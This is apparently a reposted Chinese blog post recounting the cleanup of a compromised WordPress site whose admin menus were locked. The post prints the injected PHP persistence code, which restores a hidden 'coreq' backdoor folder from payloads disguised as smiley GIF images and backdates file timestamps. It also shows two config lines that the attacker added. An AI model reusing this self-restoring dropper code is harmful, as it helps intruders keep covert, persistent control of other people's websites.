07-10 01:03 阅读 58

wordpress 后台菜单点击的时候提示没有权限

记录一次在后台操作的时候没有权限，当鼠标移动上去的时候没反应：

这部分完全的不显示，强制输入连接，直接提示没有权限

初步的判断是有人设置的角色的部分，经过查找wordpress中没有单独设置权限的部分。

然后觉的可能是什么插件影响，然后禁用所有的插件，然而，还是一动不动的。

直接进入到服务器进行查看，发现是多了个两个奇怪的文件夹

进入文件夹查看，发现不是正经的文件

然后根据文件名进行查找：

grep -rnl coreq

发现还把其他的文件也进行了修改

图片的文件是进行伪装，两个php文件中果然是写了东西

//ck1bg
$nowFileDir =  ‘coreq‘;
$nowHtacFile =  ‘./coreq/.htaccess‘;
$nmbf1 =  ‘./coreq/template.html‘;
$nowIndexFile =  ‘./coreq/index.php‘;
$nowLogFile =  ‘./coreq/logs.txt‘;
$bkLocalFileIndex1 =  ‘./wp-includes/images/smilies/icon_reds.gif‘;
$bkLocalFileHtac1 =  ‘./wp-includes/images/smilies/icon_blacks.gif‘;
$bkLocalFileMoban1 =  ‘./wp-includes/images/smilies/icon_greens.gif‘;
^M
if($nowHtacFile && file_exists($bkLocalFileHtac1)){^M
        if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){^M
                if(!is_dir("./$nowFileDir")){^M
                        @mkdir("./$nowFileDir",0755);^M
                }^M
                @chmod($nowHtacFile,0755);^M
                @file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1));^M
                @chmod($nowHtacFile,0755);^M
        }^M
}^M
^M
^M
if(file_exists($bkLocalFileIndex1)){^M
        if(!file_exists($nowIndexFile) or (filesize($nowIndexFile) != filesize($bkLocalFileIndex1) && !file_exists($nowLogFile))){^M
                if(!is_dir("./$nowFileDir")){^M
                        @mkdir("./$nowFileDir",0755);^M
                }^M
                @chmod($nowIndexFile,0755);^M
                @file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex1));^M
                @chmod($nowIndexFile,0755);^M
        }^M
}^M
^M
if(file_exists($bkLocalFileMoban1)){^M
        ^M
        if(!file_exists($nmbf1)){^M
                if(!is_dir("./$nowFileDir")){^M
                        @mkdir("./$nowFileDir",0755);^M
                }^M
                @file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban1));^M
                @chmod($nmbf1,0755);^M
        }else{^M
                if(filesize($nmbf1) != filesize($bkLocalFileMoban1)){^M
                        $tpstrMb = file_get_contents($nmbf1);^M
                        if(strstr($tpstrMb,"draft_or_post_title") && !strstr($tpstrMb,"")){^M
                                $fitime = filemtime($bkLocalFileMoban1);^M
                                @chmod($bkLocalFileMoban1,0755);^M
                                @file_put_contents($bkLocalFileMoban1,$tpstrMb);^M
                                @touch($bkLocalFileMoban1, $fitime, $fitime);  ^M
                        }else{^M
                                @chmod($bkLocalFileMoban1,0755);^M
                                @file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban1));^M
                                @chmod($bkLocalFileMoban1,0755);^M
                        }^M
                }^M
        }^M
        ^M
}
//ck1end

看变量命名，好像也不是老外写的，还能咋的，就把对应的代码给删掉，别让继续的潜伏着，图片里面的代码就不贴了。

在做了清除之后，菜单的问题依然是没有解决。

于是开始下载新版本的wordpress进行手动更新，只要不覆盖配置文件就行，然后我还是太年轻，覆盖完了之后依然没有效果。

灵机一动，直接用新的版本，只用原来的数据库和配置文件，结果还是没有结果。

老衲已经身心疲惫，想着直接放弃算了。

于是又复制了一个正常站的配置文件，把对应的数据库的信息修改了，，，这时奇迹发生了。原来篡改的文件还有配置文件。

在配置文件的最新面发现了两行

define(‘DISALLOW_FILE_EDIT‘, true);
define(‘DISALLOW_FILE_MODS‘, true);

删掉之后果然是生效了。

遗留两个问题没有解决：

1.为什么只是对插件的哪里的起作用

2.最初的源头是什么，这个没有找到，还是睡不踏实。

原文：https://www.cnblogs.com/eatmore/p/15302472.html